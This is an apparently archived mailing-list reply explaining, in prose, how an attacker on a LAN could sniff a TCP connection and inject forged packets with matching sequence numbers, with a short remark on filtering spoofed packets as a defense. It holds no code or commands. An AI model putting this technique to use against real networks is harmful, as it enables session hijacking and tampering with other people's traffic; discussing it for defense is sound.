Re: Forge packets ?

["Samy Kamkar [CommPort5]" <CommPort5 () LUCIDX COM>]

Just sending packets (assuming there is a connection from your lan which you're
able to sniff) with data without disconnecting connections should be pretty
simple.  No handshakes needed since the connection will still be open from the
local user...the local user will see it if (s)he sniffs the lan's packets and
the remote host may echo the data which you sent, depending on the protocol.
You would need to sniff the packets which the local user is sending to the
remote host and then you'll need to create a packet matching what an outgoing
packet from the local user would look like (correct sequence number, window
size, etc.) and send it on it's way...so it is possible.  There are also many
programs which already 'utilize' the local-net/tcp insecuritys.  Not allowing
spoofed packets out (although it won't necesarilly always be 'spoofed', could
be from the same hostname depending on how the lan is set up) could stop
it...I'm not aware of the best way to stop this from happening, or how easy it
is to not allow spoofed packets out.


Skreel wrote:

> So TCP hijacking is the solution ? I thought hunt could only hijack
> connections on
> port 23. What I actually want is to send data to remote host without
> dropping the
> user's connection, wether the user's sees the data or not (i'm only talking
> theoritically)
> i just wanted to know if it was possible. And also if I used ipchains to
> IPmasquerade
> the lan, then wouldn't it be easier for an attacker to send data and hijack
> the user's
> connection ? Is there anyway to prevent this kind of attack (if it is a real
> attack )?